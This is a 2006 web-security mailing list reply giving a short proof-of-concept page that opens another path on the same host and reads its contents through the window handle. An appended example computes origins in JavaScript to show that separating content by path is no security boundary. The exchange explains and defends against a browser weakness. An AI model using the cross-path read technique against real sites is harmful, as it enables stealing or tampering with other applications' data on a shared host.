Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
- From: "Amit Klein (AKsecurity)" <aksecurity@xxxxxxxxxx>
- Subject: Re: [WEB SECURITY] Technical Note by Amit Klein: "Path Insecurity"
- Date: Tue, 02 May 2006 20:13:51 +0200
On 2 May 2006 at 12:42, Brian Eaton wrote:
> Hi Amit -
>
> On 3/1/06, Amit Klein (AKsecurity) <aksecurity@xxxxxxxxxx> wrote:
> > Hopefully this is obvious, but in order to focus the discussion,
> > it is first needed to observe that a window loaded with URL
> > http://www.some.site/bar/page1.html can be both fully read and
> > fully written by a window opened with
> > http://www.some.site/foo/attack1.html, by means of the latter
> > incorporating a Javascript code that obtains a handle H for the
> > Bar window, and then reads or assigns to
> > H.document.body.innerHTML. Likewise the document URL
> > (H.document.URL), the history collection of this window
> > (H.history - actually, the way to exploit this is to traverse the
> > history list via iterative application of the prev() and next()
> > operations, each time reading the URL via H.document.URL) and the
> > document referrer (H.document.referrer) can be accessed. It
> > should be very clear that this is a fundamental security issue,
> > enabling Foo to attack Bar and to fool Bar's user easily by
> > changing data/events in Bar's page and reading sensitive data off
> > the page.
>
> I've spent the past day or two looking at javascript error messages
> without being able to get this to actually work. Are you willing to
> share a proof-of-concept?
>
/foo/attack.html:
<html>
<body>
<script>
// Open /bar/page1.html (same scheme, host and port as this page, so same origin) and keep the handle
H=window.open("/bar/page1.html");
// Give the new window time to load, then read its DOM through the handle
setTimeout("alert(H.document.body.innerHTML)",3000);
</script>
</body>
</html>
/bar/page1.html:
<html>
<body>
hello world
</body>
</html>
Fire /foo/attack.html, it'll open /bar/page1.html, then after 3 seconds, it'll pop up
"hello world" (from the body of /bar/page1.html).
Hope this helps.
-Amit
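The point underlying the proof of concept is that the same-origin policy compares only scheme, host and port, never the path. The following is an added example (not from Amit's post or the list) that computes the origin tuple with the standard WHATWG URL API and shows which of several constructed URLs a document at /foo/attack1.html could reach through a window handle; the hostname bar.some.site is a made-up illustration of the usual fix, moving the two paths to separate hosts.

```javascript
// Added example: origin comparison as the browser does it (scheme, host, port).
// Uses the WHATWG URL class available in browsers and Node.js.
function originOf(urlString) {
  const u = new URL(urlString);
  // u.port is "" when the scheme's default port is used; normalise so that
  // http://h/ and http://h:80/ compare equal
  const defaultPorts = { "http:": "80", "https:": "443" };
  const port = u.port || defaultPorts[u.protocol] || "";
  return { scheme: u.protocol.replace(/:$/, ""), host: u.hostname.toLowerCase(), port };
}

function sameOrigin(a, b) {
  const x = originOf(a);
  const y = originOf(b);
  // The path never takes part in the comparison
  return x.scheme === y.scheme && x.host === y.host && x.port === y.port;
}

// Which of the candidate documents could a page loaded at `attacker` read and
// write through a window handle (plain SOP, no document.domain relaxation)?
function reachableFrom(attacker, candidates) {
  return candidates.filter((u) => sameOrigin(attacker, u));
}

// Constructed sample URLs (the hosts are placeholders from the post)
const ATTACK = "http://www.some.site/foo/attack1.html";
const CANDIDATES = [
  "http://www.some.site/bar/page1.html",      // same origin: only the path differs
  "http://www.some.site:80/bar/page1.html",   // explicit default port: still same origin
  "https://www.some.site/bar/page1.html",     // different scheme: isolated
  "http://www.some.site:8080/bar/page1.html", // different port: isolated
  "http://bar.some.site/page1.html",          // assumed separate host: isolated
];

for (const u of CANDIDATES) {
  console.log(sameOrigin(ATTACK, u) ? "REACHABLE " : "isolated  ", u);
}
```

Only the first two candidates are reachable, which is why separating sensitive content by path alone is not a security boundary, while a distinct host or port is.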
---------------------------------------------------------------------
The Web Security Mailing List
http://www.webappsec.org/lists/websecurity/
The Web Security Mailing List Archives
http://www.webappsec.org/lists/websecurity/archive/
Brought to you by http://www.webappsec.org